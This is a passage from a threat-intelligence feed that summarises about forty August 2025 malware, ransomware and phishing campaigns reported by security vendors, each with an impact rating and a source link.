Summary:: Researchers at Trustwave have identified an EncryptHub intrusion campaign combining live social-engineering with exploitation of Microsoft Management Console (MMC) “EvilTwin” (CVE-2025-26633) to gain execution and persistent control of victim systems. Threat actors impersonate IT support during unsolicited calls, guide targets into a remote session, and deploy a staged PowerShell loader that replaces a benign MMC snap-in with a malicious counterpart in the MUIPath directory. When launched, mmc.exe loads the twin and initiates encrypted command-and-control communications. The payload chain includes data theft modules targeting files, system credentials, and cryptocurrency wallets, as well as a Golang-based loader (“SilentCrystal”) that retrieves stage archives from Brave Support to blend into legitimate traffic.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/when-hackers-call-social-engineering-abusing-brave-support-and-encrypthubs-expanding-arsenal/

Intel Source:: Cloudflare

Intel Name:: Proofpoint_and_Intermedia_Link_Wrapping_Abuse

Date of Scan:: 2025-08-16

Impact:: MEDIUM

Summary:: Cloudflare researchers have uncovered a phishing campaign in which threat actors exploit legitimate link wrapping services from Proofpoint and Intermedia to conceal malicious URLs. These obfuscated links redirect victims to deceptive Microsoft Office 365 credential harvesting pages. The attackers use social engineering lures such as fake voicemail alerts, shared Teams or Word documents, and Zix Secure Message prompts which lead to phishing sites that impersonate Microsoft and Constant Contact login portals. The primary objective of the campaign is credential theft, likely for financial fraud and identity misuse.

Source: https://www.cloudflare.com/threat-intelligence/research/report/attackers-abusing-proofpoint-intermedia-link-wrapping-to-deliver-phishing-payloads/

Intel Source:: Koi Security (Medium)

Intel Name:: GreedyBear_Campaign

Date of Scan:: 2025-08-16

Impact:: LOW

Summary:: Researchers at Koi Security identified a financially motivated cybercriminal group called GreedyBear, targeting cryptocurrency using through weaponized Firefox extensions, malicious Windows executables and fake websites. The group’s primary objective is to harvest wallet credentials and exfiltrate funds through a centralized C2 server. GreedyBear leverages a technique called Extension Hollowing where they initially deploying non malicious extensions with fake positive reviews then convert them into malicious to steal wallet credentials. The group distribute credential stealers, ransomware variants and generic trojans through cracked software sites. Victims include crypto users, individuals who download pirated software, and those visiting fake wallet repair pages.

Source: https://blog.koi.security/greedy-bear-massive-crypto-wallet-attack-spans-across-multiple-vectors-3e8628831a05

Intel Source:: Check Point

Intel Name:: Deployment_of_Multi_Ransomware_via_SharePoint_Exploitation

Date of Scan:: 2025-08-16

Impact:: HIGH

Summary:: Check Point researchers have identified Storm-2603, a previously undocumented, China-affiliated threat actor linked to the exploitation of Microsoft SharePoint Server vulnerabilities. Active between March and July 2025, the group targeted organizations across Latin America and the Asia-Pacific region, deploying multiple ransomware families including LockBit Black and Warlock/X2anylock via MSI installers that exploit DLL hijacking techniques. Storm-2603 employs a custom AK47 C2 framework with both DNS and HTTP backdoors, and leverages open-source tools such as PsExec and masscan alongside a custom BYOVD-based antivirus terminator to evade detection. This sophisticated toolset enables stealthy operations, robust persistence, and high-impact data encryption across enterprise environments.

Source: https://research.checkpoint.com/2025/before-toolshell-exploring-storm-2603s-previous-ransomware-operations/

Intel Source:: 360 Threat Intelligence Center

Intel Name:: Blind_Eagle_Deploys_DcRAT_via_SVG_Phishing

Date of Scan:: 2025-08-15

Impact:: MEDIUM

Summary:: Researchers at the 360 Threat Intelligence Center reported that APT-C-36 (Blind Eagle) conducted spearphishing attacks in May 2025, aiming to deploy the open-source DcRAT remote access tool. The group leverages malicious SVG files containing download links hosted on bitbucket, tricking victims into executing a legitimate GitKraken component that side-loads a custom, obfuscated DLL. This payload incorporates techniques such as virtual machine detection, control-flow flattening, and anti-analysis checks before injecting DcRAT into msbuild.exe or InstallUtil.exe via process hollowing. Persistence is achieved through registry Run keys. The campaign primarily targets government entities, financial and insurance sectors, and large enterprises across Colombia, Ecuador, Chile, and Panama.

Source: https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247507237&idx=1&sn=8302408c71adb39f8998bf693ccd39f2&poc_token=HFCJnWij7sJxRegOijAlSRGFgUmrmPgtuSamiWw0

Intel Source:: infoblox

Intel Name:: VexTrio_Global_Scam_Distribution_Network

Date of Scan:: 2025-08-15

Impact:: MEDIUM

Summary:: Researchers at Infoblox Threat Intel have identified a persistent cybercriminal operation, VexTrio, that orchestrates a large-scale traffic distribution and affiliate scam network spanning multiple fraud verticals, including dating, cryptocurrency, sweepstakes, fake antivirus, and deceptive push notifications. The group uses cloaked smartlinks embedded in compromised websites and social platforms, funneling victims through spoofed brand pages and scripted “click to allow” prompts, while expanding into mobile app–based monetization via VPNs, “spam blockers,” and dating applications published under frequently rotated developer accounts.

Source: https://blogs.infoblox.com/threat-intelligence/vextrio-unmasked-a-legacy-of-spam-and-homegrown-scams/

Intel Source:: ReliaQuest

Intel Name:: ShinyHunters_Spider_Salesforce_Intrusion

Date of Scan:: 2025-08-15

Impact:: MEDIUM

Summary:: Researchers at ReliaQuest have identified coordinated Salesforce-targeted intrusions conducted by ShinyHunters that exhibit strong tactical overlap with Scattered Spider operations, suggesting collaboration or shared resources. The campaign combines phishing and vishing to impersonate corporate IT staff, lure victims to Okta-branded SSO portals, and convince them to authorize malicious Salesforce connected apps, enabling large-scale CRM data exfiltration. VPN infrastructure is used during the extraction to obscure origin. Analysis of domain registrations and underground forum activity indicates the nexus began mid-2024, with a sharp rise in infrastructure creation in late June 2025 and live phishing domains active as of August 1, 2025.

Source: https://reliaquest.com/blog/threat-spotlight-shinyhunters-data-breach-targets-salesforce-amid-scattered-spider-collaboration/

Intel Source:: SlowMist

Intel Name:: Web3_Interview_Scam

Date of Scan:: 2025-08-15

Impact:: LOW

Summary:: Researchers from SlowMist have uncovered a Web3 scam campaign where attackers leverage malicious NPM package called rtk-logger@1.11.5 disguise as a fake job interview targeting developers. The attackers lure candidates into cloning a repository masquerading as a Ukrainian team that secretly contains the package. Once installed, it exfiltrates sensitive data such as browser extension information, cryptocurrency wallet files, seed phrases, session tokens, and login credentials for potential espionage and financial theft. The malware employs heavily obfuscated JavaScript, AES-256-CBC–encrypted payloads decoded at runtime, and Node.js modules to harvest data from Chrome, Brave, Opera, Firefox, Exodus wallets, and macOS Keychain. The Stolen data is sent to attacker-controlled servers, while a secondary Python script enable remote access and command execution. This supply chain compromise exploits malicious dependencies to establish initial access, persistence, and C2 capabilities.

Source: https://slowmist.medium.com/threat-intelligence-uncovering-a-web3-interview-scam-bb366694b7f3

Intel Source:: Socket

Intel Name:: RubyGems_Infostealer

Date of Scan:: 2025-08-15

Impact:: LOW

Summary:: Researchers from Socket have uncovered a long-running supply chain attack targeting the RubyGems ecosystem, , attributed to a threat actor operating under aliases such as zon, nowon, kwonsoonje, and soonje. Since at least March 2023, the attacker has published over 60 malicious RubyGems packages disguise as automation tools for platforms like Instagram, Twitter/X, TikTok, WordPress, Telegram, Kakao, and Naver. Although these tools provide legitimate bulk-posting and engagement functionalities, they secretly steal user credentials and MAC addresses from compromised systems and exfiltrate the data to attacker-controlled servers via HTTP POST. The primary victims are grey-hat marketers who rely on social media accounts and automation tools. The use of Korean-language interfaces and region-specific infrastructure suggests a particular focus on South Korean users.

Source: https://socket.dev/blog/60-malicious-ruby-gems-used-in-targeted-credential-theft-campaign?utm_medium=feed

Intel Source:: ASEC

Intel Name:: PAM_Hooking_Backdoor_on_Linux

Date of Scan:: 2025-08-14

Impact:: MEDIUM

Summary:: Researchers at ASEC have observed threat actors abusing Linux Pluggable Authentication Modules (PAM) to steal credentials and maintain persistent access, using either malicious PAM modules or a PRELOAD-based hooking variant dubbed “Plague.” The malware intercepts authentication flows in services like sshd, captures credentials at login, and can accept a universal backdoor password while suppressing shell history and hiding artifacts to reduce evidence. Initial access remains unspecified, but persistence is achieved by loading a malicious library before legitimate PAM functions, enabling reliable credential capture and account takeover across users.

Source: https://asec.ahnlab.com/en/89557/

Intel Source:: Trend Micro

Intel Name:: Charon_Ransomware

Date of Scan:: 2025-08-14

Impact:: MEDIUM

Summary:: Researchers from Trend Micro have identified a new ransomware called Charon targeting public sector and aviation organizations in the Middle East. The attackers use advanced APT-style tactics similar to Earth Baxia campaigns, starting the attack by abusing DLL sideloading with a legitimate Edge browser file to load malicious code, which then injects the ransomware into svchost.exe to evade detection. Charon leverages process injection to bypass endpoint controls, disables security services, terminates protection software, and deletes shadow copies to impede recovery before encrypting both local and network shares using Curve25519/ChaCha20 encryption. It appends a [.]Charon extension to each file and embeds a custom infection marker, then drops a tailored ransom note “How To Restore Your Files.txt” across drives and shares locations.

Source: https://www.trendmicro.com/en_us/research/25/h/new-ransomware-charon.html

Intel Source:: ASEC

Intel Name:: SmartLoader_GitHub_Infostealer_Campaign

Date of Scan:: 2025-08-14

Impact:: LOW

Summary:: Researchers at AhnLab Security Intelligence Center (ASEC) have identified a financially motivated operation that floods GitHub with repositories purporting to offer game cheats, software cracks, and automation tools. Visitors who download the supplied archive install an obfuscated Lua loader dubbed “SmartLoader,” which establishes persistence, harvests host information, and opens encrypted command-and-control to retrieve the Rhadamanthys infostealer. The stealer embeds itself in legitimate Windows processes and siphons credentials from email, FTP, and online-banking applications. First observed in August 2025, the campaign exploits search-engine optimisation to reach a global audience without resorting to phishing, enabling large-scale credential theft at minimal cost.

Source: https://asec.ahnlab.com/en/89551/

Intel Source:: Fortinet

Intel Name:: ClickFix_PowerShell_RAT_Campaign

Date of Scan:: 2025-08-13

Impact:: LOW

Summary:: FortiGuard researchers have uncovered a phishing campaign targeting Israeli organisations that employs PowerShell-only attack chain to deliver a RAT that enables persistent remote control, data exfiltration, surveillance, and lateral movement. The attack starts with spear-phishing emails that lead to a spoofed Microsoft Teams login page that trick users into pasting obfuscated PowerShell commands through the Windows Run dialog. These commands execute a Click-to-Fix loader script, which uses Invoke-RestMethod over HTTPS to download and additional scripts directly in memory. Once deployed, the RAT gathers system details like the Windows domain, system name, and username, then continuously checks for commands from its hard-coded C2 servers for further instructions.

Source: https://www.fortinet.com/blog/threat-research/clickfix-to-command-a-full-powershell-attack-chain

Intel Source:: ForcePoint

Intel Name:: Odyssey_MacOS_Stealer

Date of Scan:: 2025-08-13

Impact:: LOW

Summary:: Researchers from Forcepoint uncovered the Odyssey Stealer campaign that targets a macOS users through a deceptive ClickFix CAPTCHA webpage. This lure delivers a Base64-encoded AppleScript payload that harvests browser extensions, cookies, keychains, and cryptocurrency wallet data before exfiltration. The campaign’s primary objective is financial gain through theft of credentials and crypto assets. Relying on social engineering and phishing, the attackers bypass traditional binary-based payloads to evade detection. Once executed the malware compresses the collected data and exfiltrates it to an attackers-controlled C2 server. The campaign specifically targets individual macOS users with stored credentials and crypto wallets.

Source: https://www.forcepoint.com/blog/x-labs/odyssey-stealer-attacks-macos-users

Intel Source:: Socradar

Intel Name:: Exploitation_of_WinRAR_Vulnerability_by_RomCom

Date of Scan:: 2025-08-13

Impact:: MEDIUM

Summary:: A newly discovered zero-day vulnerability (CVE-2025-8088) in the Windows version of WinRAR allows attackers to perform a critical path traversal, enabling them to hide malicious files in NTFS alternate data streams and force extraction into high-privilege locations. The vulnerability has been actively exploited by the Russia-aligned RomCom group (also known as Storm-0978, Tropical Scorpius, or UNC2596 which delivered via targeted spear-phishing emails disguised as job applications with malicious RAR attachments. Once extracted, these payloads install shortcuts and DLLs in %TEMP%, %LOCALAPPDATA% folders and the Windows Startup folder, ensuring persistence and automatic execution at system starts. The campaign leverages three attack chains—Mythic Agent, SnipBot and RustyClaw/MeltingClaw downloaders— each supported by dedicated C2 infrastructure for modular and flexible operations.

Source: https://socradar.io/cve-2025-8088-winrar-zero-day-exploited-targeted/

Intel Source:: Aryaka

Intel Name:: Kimsuky_Targeting_South_Korean_Critical_Entities

Date of Scan:: 2025-08-12

Impact:: MEDIUM

Summary:: Researchers from Aryaka have uncovered a stealthy cyber-espionage campaign attributed to the North Korean state-sponsored Kimsuky also tracked APT43, Thallium and Velvet Chollima. The campaign targets South Korean government agencies, defense contractors, and research organizations. It begins with spear-phishing emails delivering malicious (.lnk) files that execute obfuscated HTA payloads via mshta.exe, bypassing static detection, and performing anti-VM checks to evade sandbox environments. Upon execution, the HTA scripts decode and execute PowerShell-based stealer and keylogger components to harvest system information, recently accessed files, browser credentials and clipboard data. The stolen data is compressed into ZIP archives, segmented into multipart HTTP POST requests, and exfiltrated to C2 infrastructure. To maintain persistence, the malware modifies Windows registry Run keys and uses DLL injection to execute payloads directly into memory.

Source: https://www.aryaka.com/docs/reports/aryaka-kimsuky-apt-operational-blueprint.pdf

Intel Source:: K7 Labs

Intel Name:: Cmimai_Information_Stealer

Date of Scan:: 2025-08-12

Impact:: LOW

Summary:: K7 Labs researchers identified a VBS-based infostealer named Cmimai stealer that leverages Visual Basic scripting and PowerShell modules to harvest system metadata, browser information, and periodic screenshots from compromised Windows hosts. The malware operates silently in the background and maintains persistence by itself automatically every hour. It stores activity logs in a temporary file and exfiltrates the stolen data to a Discord channel using HTTP POST to evade detection. The malware bypasses PowerShell execution restrictions and executes in invisible mode.

Source: https://labs.k7computing.com/index.php/silent-watcher-dissecting-cmimai-stealers-vbs-payload/

Intel Source:: Cyfirma

Intel Name:: Fake_Telegram_Site_Deploys_Lumma_Stealer_Variant

Date of Scan:: 2025-08-12

Impact:: MEDIUM

Summary:: CYFIRMA researchers have observed a malicious campaign that delivers a new Lumma Stealer variant via a spoofed Telegram Premium site. The operation began in mid-July 2025 and relies on a fake domain impersonating the legitimate Telegram Premium platform. Upon visiting the site, a Windows executable is automatically downloaded and executed without user interaction, enabling immediate system compromise. The malware is designed to exfiltrate browser-stored credentials, system metadata, and cryptocurrency wallet details. It employs techniques including dynamic code execution, registry manipulation, clipboard access, and DLL injection to maintain persistence and evade detection.

Source: https://www.cyfirma.com/research/fake-telegram-premium-site-distributes-new-lumma-stealer-variant/

Intel Source:: Polyswarm

Intel Name:: CastleLoader_Targeting_US_Government_Entities

Date of Scan:: 2025-08-11

Impact:: MEDIUM

Summary:: Researchers from Polyswarm have uncovered a new malware loader called CastleLoader, which targets U.S. government entities using phishing tactics and deceptive GitHub repositories. It distributes through Cloudflare-themed ClickFix phishing pages and fake GitHub repositories, disguised as legitimate tools like SQL Server Management Studio. Once executed, CastleLoader delivers payloads such as StealC, RedLine, DeerStealer and NetSupport RAT, SectopRAT, and HijackLoader. It leverages PowerShell and AutoIT scripts, injects shellcode into memory, and communicates with seven C2 servers through a web panel that enables payload control, privilege escalation, VM detection, and evasion through fake error messages.

Source: https://blog.polyswarm.io/castleloader

Intel Source:: Acronis

Intel Name:: A_Resurgence_of_Akira_and_Lynx_Ransomware_Groups

Date of Scan:: 2025-08-11

Impact:: MEDIUM

Summary:: Acronis Researchers have observed a resurgence of two ransomware operators named Akira and Lynx who have resumed high-volume operations in 2024–2025, leveraging double-extortion tactics to maximize financial gain. Their campaigns begin with phishing emails or the exploitation of known vulnerabilities in VPN and firewall (Cisco CVE-2023-20269, SonicWall CVE-2024-40766) to gain initial access, followed by use of stolen or purchased administrative credentials for lateral movement. Operators conduct reconnaissance and privilege escalation, then employ PowerShell and Restart Manager to disable security software, delete shadow copies, and clear event logs. The ransomware encrypts files using ChaCha20 encryption and appends an RSA-encrypted key, while victims’ data is archived and exfiltrated, threatening public exposure if ransom demands aren't met. Akira has targeted over 220 organizations, primarily law firms, construction companies, and accounting firms while Lynx compromised at least 145 private-sector businesses, with a focus on managed service providers and small to mid-sized enterprises.

Source: https://www.acronis.com/en-us/tru/posts/msps-a-top-target-for-akira-and-lynx-ransomware/

Intel Source:: Proofpoint

Intel Name:: Tycoon_Phishing_Platform_Abuses_OAuth_to_Bypass_MFA

Date of Scan:: 2025-08-11

Impact:: MEDIUM

Summary:: Proofpoint researchers have identified a phishing-as-a-service (PhaaS) platform known as Tycoon, which is actively conducting OAuth application impersonation campaigns to bypass MFA and facilitate account takeovers. These campaigns leverage spear phishing emails containing links to malicious OAuth consent page that impersonate legitimate enterprise applications such as ILSMART and Adobe Sign. Once users grant permissions, the victim is redirected through a CAPTCHA to a fake Microsoft authentication page where credentials and the associated session cookie are harvested via the AiTM technique. This approach allows attackers to proxy the authentication flow and steal valid tokens in real time. The attackers primary targets organisations within the U.S. aerospace and defense sectors. Tycoon enables persistent, token-based access effectively bypassing MFA and exposing organizations to data exfiltration, account abuse, and further post-compromise activities.

Source: https://www.proofpoint.com/us/blog/threat-insight/microsoft-oauth-app-impersonation-campaign-leads-mfa-phishing

Intel Source:: Socket

Intel Name:: Malicious_Go_Packages_Distribute_Remote_Payloads

Date of Scan:: 2025-08-10

Impact:: LOW

Summary:: Researchers have uncovered a software supply chain campaign involving eleven malicious Go packages designed to target developers and CI systems. These packages contain obfuscated loaders that quietly open command-line shells and download second-stage payloads from C2 servers hosted on .icu and .tech domains. The malware executes directly in memory using Unix (wget | bash) and Windows (certutil.exe) commands. The attackers use Typosquatting technique to create malicious packages to trick developers into installing them. Once imported, the malware can run silently on Linux build servers or Windows workstations, allowing remote code execution, data theft, unauthorized access, and even ransomware deployment.

Source: https://socket.dev/blog/11-malicious-go-packages-distribute-obfuscated-remote-payloads?utm_medium=feed

Intel Source:: Silentpush

Intel Name:: SocGholish_Malware_Campaign

Date of Scan:: 2025-08-10

Impact:: MEDIUM

Summary:: Researchers at Silent Push have uncovered that the TA569 threat group is actively conducting a SocGholish campaign, which deceives users into installing malware through fake browser update prompts on legitimate but compromised websites. When users click on these fake Chrome or Firefox updates, a malicious Jscript based payload is downloaded onto their Windows systems. TA569 operates SocGholish as a MaaS platform, providing access to compromised systems to ransomware groups such as LockBit and Evil Corp, as well as other APT actors. The attackers use advanced techniques like domain shadowing and frequently changing C2 servers to evade detection. Additionally, they leverage Parrot TDS and Keitaro TDS to identify and target high-value victims based on their browser and activity. This campaign mainly targets users in North America and facilitates data theft, unauthorized remote access, and ransomware deployment.

Source: https://www.silentpush.com/blog/socgholish/?utm_source=rss&utm_medium=rss&utm_campaign=socgholish

Intel Source:: Fortinet

Intel Name:: DarkCloud_Campaign

Date of Scan:: 2025-08-10

Impact:: MEDIUM

Summary:: Researchers at FortiGuard Labs have identified a new variant of the DarkCloud campaign leverages a spearphishing email containing a malicious RAR file to execute obfuscated JavaScript and PowerShell scripts that load a fileless .NET module from a JPEG image embedded with code and hosted on archive.org. This module masquerades as a Windows Task Scheduler library, maintains persistence through the registry, and retrieves an additional payload from paste.ee to deploy a VB6-based DarkCloud stealer through process hollowing. It collects sensitive data such as system info, browser credentials, payment details, and email contacts, storing them locally before exfiltrating the information through encrypted emails to an attacker-controlled server.

Source: https://www.fortinet.com/blog/threat-research/unveiling-a-new-variant-of-the-darkcloud-campaign

Intel Source:: Sentinel Labs

Intel Name:: Ethereum_Drainer_Trading_Bot_Scam

Date of Scan:: 2025-08-09

Impact:: LOW

Summary:: Researchers at SentinelOne Labs have uncovered a campaign in which threat actors employ obfuscated Solidity contracts disguised as Ethereum MEV trading bots to drain user wallets of significant funds. Since early 2024, actors have distributed weaponized contracts via aged YouTube channels, leveraging AI-generated videos and curated comment sections to fabricate legitimacy. Victims follow deployment instructions in Remix and fund the contract via Start() or StartNative(), triggering a failover mechanism that routes deposits to an attacker-controlled wallet.

Source: https://www.sentinelone.com/labs/smart-contract-scams-ethereum-drainers-pose-as-trading-bots-to-steal-crypto/

Intel Source:: Zscaler

Intel Name:: GenAI_Powered_Brazil_Gov_Phishing

Date of Scan:: 2025-08-09

Impact:: MEDIUM

Summary:: Researchers at Zscaler ThreatLabz have observed criminals using low cost generative AI tools DeepSite AI and BlackBox AI to clone Brazil’s State Department of Traffic and Ministry of Education portals and push the replicas to the top of search results through aggressive SEO poisoning. Citizens seeking licences or jobs are lured to the fake sites, enter CPF numbers and personal details that are validated in real time via attacker controlled APIs, and are then instructed to pay a one-time R$87 “registration fee” via Pix, Brazil’s instant-payment system. The operation yields both direct revenue and a trove of verified identity data, enabling follow-on fraud and identity theft.

Source: https://www.zscaler.com/blogs/security-research/genai-used-phishing-websites-impersonating-brazil-s-government

Intel Source:: unit42

Intel Name:: AK47_SharePoint_Exploit_Campaign

Date of Scan:: 2025-08-09

Impact:: MEDIUM

Summary:: Researchers at Palo Alto have observed a cluster tracked as CL-CRI-1040 exploiting newly disclosed SharePoint vulnerabilities since March 2025 via the ToolShell exploit chain, deploying both DNS- and HTTP-based backdoors alongside a custom ransomware strain dubbed AK47 (X2ANYLOCK). The actor leveraged CVE-2025-49704 and related flaws to breach on-premises SharePoint servers, executing commands, exfiltrating data via DNS TXT records and HTTP POST, then encrypting hosts for financial gain. Initial dnsclient and httpclient components surfaced in March and April 2025, rapidly evolving into a full ransomware loader by April 6, 2025. The blend of stealthy exfiltration, adaptive C2 protocols and destructive encryption highlights a sophisticated, financially motivated actor building on LockBit 3.0 and Warlock tactics.

Source: https://unit42.paloaltonetworks.com/ak47-activity-linked-to-sharepoint-vulnerabilities/

Intel Source:: Safety

Intel Name:: AI_Generated_NPM_Malware_Target_Developers

Date of Scan:: 2025-08-09

Impact:: LOW

Summary:: Safety researchers have discovered an AI-generated malicious NPM package called @kodane/patch-manager disguise as crypto wallet drainer targeting software developers. The package masquerades as registry caches manager, but once installed, it secretly executes a hidden script that deploys background programs in concealed cache directories. It then connects to a remote server using WebSocket without requiring any authentication. Upon detecting of crypto wallet, a second script is activated, which swiftly transfers most of the funds to a Solana wallet. This malicious package impacts users across macOS, Linux, and Windows, putting both developers and their end-users at serious risk of financial loss.

Source: https://getsafety.com/blog-posts/threat-actor-uses-ai-to-create-a-better-crypto-wallet-drainer

Intel Source:: Securelist

Intel Name:: MedusaLocker_Ransomware_Deployment

Date of Scan:: 2025-08-08

Impact:: MEDIUM

Summary:: Kaspersky researchers have uncovered a ransomware campaign in which attackers leverage an AV killer tool to disable antivirus software on Windows systems. This tool, based on Win64KILLAV malware exploits a legitimate driver (ThrottleBlood.sys) to execute malicious code at the system level. The attackers gain access through compromised email or remote desktop accounts, followed by lateral movement using pass-the-hash techniques. Once the AV protections are disabled, the attackers deploy a MedusaLocker ransomware variant to encrypt critical files. The campaign primarily targets systems in Russia, Belarus, Kazakhstan, Ukraine, and Brazil. Additionally, the attackers bypass security layers, spread through the network, and cause significant data loss and operational disruption.

Source: https://securelist.com/av-killer-exploiting-throttlestop-sys/117026/

Intel Source:: The DFIR Report

Intel Name:: Bumblebee_and_AdaptixC2_Deliver_Akira_Ransomware

Date of Scan:: 2025-08-08

Impact:: MEDIUM

Summary:: According to researchers at The DFIR, a threat actor leverages SEO poisoning technique to trick users into downloading a fake installer for ManageEngine OpManager, which delivers the Bumblebee malware. Once inside the network, Bumblebee quickly deploys an AdaptixC2 to conduct internal reconnaissance and steal credentials, to facilitate domain compromise. The actor creates two user accounts named backup_DA and backup_EA, giving one of them high-level privilege access, and uses wbadmin.exe to dump sensitive data. They maintain persistence through the installation of RustDesk and the establishment of an SSH reverse tunnel to an external server. The attackers exfiltrates critical data via SFTP and collect additional credentials by dumping LSASS memory. Two days later, they return and deploy Akira ransomware across both root and child domains, encrypting files on local systems and shared drives, causing significant operational disruption.

Source: https://thedfirreport.com/2025/08/05/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira/

Intel Source:: Imperva

Intel Name:: Exploitation_of_Rejetto_HTTP_File_Server_Vulnerability

Date of Scan:: 2025-08-08

Impact:: MEDIUM

Summary:: Researcher at Imperva uncovered a campaign where an unidentified threat actor exploits CVE-2024-23692 in Rejetto HTTP File Server (HFS) 2.x to gain unauthenticated remote code execution and deploy multiple malware families, including the Farfli downloader, Zenpak trojan, and jqvtd ransomware. The attackers conducted automated internet wide scanning to identify exposed HFS servers and delivered malicious payloads via specially crafted requests that executed PowerShell and cmd.exe commands. The malware strains enable the attackers to harvest data, maintain persistent access, and encrypt files for ransom. Additionally, the compromised systems were observed communicating with to C2 serves hosted in Hong-Kong and domain called sgke[.]cc. The campaign primarily targets organization in business, healthcare, and financial sectors.

Source: https://www.imperva.com/blog/imperva-detects-and-mitigates-rejetto-hfs-spray-and-pray-ransomware-trojan-campaign/

Intel Source:: Cyfirma

Intel Name:: APT36_MFA_OTP_Harvesting_Campaign

Date of Scan:: 2025-08-07

Impact:: MEDIUM

Summary:: Researchers at Cyfirma have observed Pakistan-linked APT36 orchestrating a sophisticated phishing operation targeting Indian government email systems by leveraging typo-squatted domains and harvesting time-based Kavach OTPs. Domains registered in June–July 2025 and hosted on Amazon and Cloudflare infrastructure were configured to relay credentials to Pakistani C2 servers, enabling real-time exfiltration. The operation’s advanced social engineering and coordinated domain deployments heighten the risk of unauthorized access to classified data and disruption of critical government infrastructure.

Source: https://www.cyfirma.com/research/apt36-a-phishing-campaign-targeting-indian-government-entities/

Intel Source:: ANY.RUN

Intel Name:: Lazarus_Deploys_PyLangGhost_RAT_to_Steal_Data

Date of Scan:: 2025-08-07

Impact:: MEDIUM

Summary:: Researchers at ANY.RUN and BlockOSINT have identified PyLangGhost RAT, a Python-based successor to GoLangGhost RAT, attributed to the North Korean Lazarus subgroup Famous Chollima. This malware employs a unique “ClickFix” social engineering lure, masquerading as fake camera or microphone errors during job interviews to deceive developers and executives into executing malicious scripts. Once installed, the RAT establishes persistence via a Run key, disguises its python.exe process as csshost.exe, and initiates raw-IP HTTP communication with its command-and-control servers using weak RC4/MD5 encryption. Its modular capabilities enable system reconnaissance, theft of credentials and cryptocurrency wallets by decrypting Chrome’s DPAPI keys, and exfiltration of data as compressed archives. The campaign primarily targets organizations in the finance, technology, and cryptocurrency sectors, with a particular focus on browser-stored credentials and wallet configurations.

Source: https://any.run/cybersecurity-blog/pylangghost-malware-analysis/

Intel Source:: GuidePoint Security

Intel Name:: Malicious_Driver_Use_in_Akira_SonicWall_Attack

Date of Scan:: 2025-08-07

Impact:: HIGH

Summary:: Researchers at GuidePoint Security have observed that Akira ransomware affiliates are exploiting two legitimate Windows drivers—rwdrv.sys and hlpdrv.sys—as part of a Bring Your Own Vulnerable Driver (BYOVD) technique to bypass antivirus and EDR defenses. This activity typically follows initial access via SonicWall SSL VPN abuse** and is motivated by financial gain through ransomware deployment. In several incident response cases, this tactic has been directly linked to successful Akira ransomware encryptions. The attackers register rwdrv.sys (associated with the ThrottleStop utility) as a service to gain kernel-level privileges, and then deploy hlpdrv.sys to modify the DisableAntiSpyware policy in Windows Defender using regedit.exe. This manipulation effectively disables key endpoint protection features, increasing the likelihood of undetected operations and successful encryption of critical data. The campaign appears to target organizations using SonicWall VPNs, with activity traced back to at least July 15, 2025.

Source: https://www.guidepointsecurity.com/blog/gritrep-akira-sonicwall/

Intel Source:: Mcafee

Intel Name:: EPI_PDF_Browser_Hijacker

Date of Scan:: 2025-08-07

Impact:: LOW

Summary:: Researchers at McAfee Labs have observed a deceptive installer masquerading as a PDF converter that silently deploys a Chromium-based browser extension to redirect homepages and searches. The utility, distributed via consumer software download sites in Q2 2025, imports existing browser settings by default and alters them without explicit consent. Analysis of over 118,000 device encounters in the United States highlights widespread exposure to this potentially unwanted program. The tactic leverages user inattention to default install options and opaque privacy disclosures to monetize free downloads through forced search-engine changes. These hijacking actions degrade user experience, compromise privacy, and may serve as a beachhead for further exploitation.

Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/think-before-you-click-epi-pdfs-hidden-extras/

Intel Source:: PointWild

Intel Name:: REMCOS_Backdoor

Date of Scan:: 2025-08-05

Impact:: MEDIUM

Summary:: According to researchers at Point Wild, The Trojan.WinLNK/PowerShell Runner campaign, leverages malicious Windows shortcut files delivered via spear-phishing emails to deploy the REMCOS backdoor. These shortcut files impersonate invoice document but execute hidden PowerShell commands. The script downloads disguised malicious image file that turns into an executable named CHROME.PIF and launches it. Once active, REMCOS provides attackers full remote access to the compromised system, enabling keystrokes logging, run commands, transfer files, and complete system control. It communicates with its C2 server using a custom TCP channel through renamed Windows utilities like colorcpl.exe. The malware also ensures it stays active by creating scheduled tasks and adding itself to the system’s startup.

Source: https://www.pointwild.com/threat-intelligence/trojan-winlnk-powershell-runner

Intel Source:: Team Huntress

Intel Name:: Akira_Exploits_SonicWallVPNZeroDay

Date of Scan:: 2025-08-05

Impact:: HIGH

Summary:: According to Team Huntress, threat actors are actively exploiting a likely zero-day vulnerability in SonicWall Secure Mobile Access and firewall appliances to bypass MFA controls and gain initial access . Using over-privileged service accounts and built-in Windows tools, they rapidly establish Cloudflared and OpenSSH tunnels for persistence while leveraging WMI and PowerShell Remoting to pivot to domain controllers . Post-exploitation activity includes dumping and decrypting Veeam backup credentials and extracting the NTDS.dit database for offline cracking . Defenses are systematically disabled through Set-MpPreference and netsh commands before deploying Akira ransomware and deleting Volume Shadow Copies with vssadmin.exe . Affected environments include those with MFA enabled, highlighting the vulnerability’s potency and operational impact. This campaign’s objective appears financial gain via ransomware, posing significant threats to data availability and business continuity. Organizations with exposed SonicWall VPN infrastructure face heightened risk of rapid network compromise and should urgently validate their security posture.

Source: https://www.huntress.com/blog/exploitation-of-sonicwall-vpn

Intel Source:: Nextron

Intel Name:: Plague_Linux_Backdoor

Date of Scan:: 2025-08-05

Impact:: MEDIUM

Summary:: Researchers at Nextron have discovered a Linux backdoor known as Plague, which enables attackers to maintain persistent SSH access by bypassing standard login checks. It works by injecting itself into the Pluggable Authentication Module (PAM), enabling unauthorized logins without raising alarms. Plague employs advanced obfuscation techniques such as XOR encoding, KSA/PRGA, DRBG to hide its presence in code. It executes checks to avoid sandbox environments and uses hardcoded credentials for access. Once active, it clears any trace of its presence by disabling command history and removing traces of SSH sessions.

Source: https://www.nextron-systems.com/2025/08/01/plague-a-newly-discovered-pam-based-backdoor-for-linux/

Intel Source:: Genians

Intel Name:: APT37_Use_RokRAT_Malware

Date of Scan:: 2025-08-05

Impact:: MEDIUM

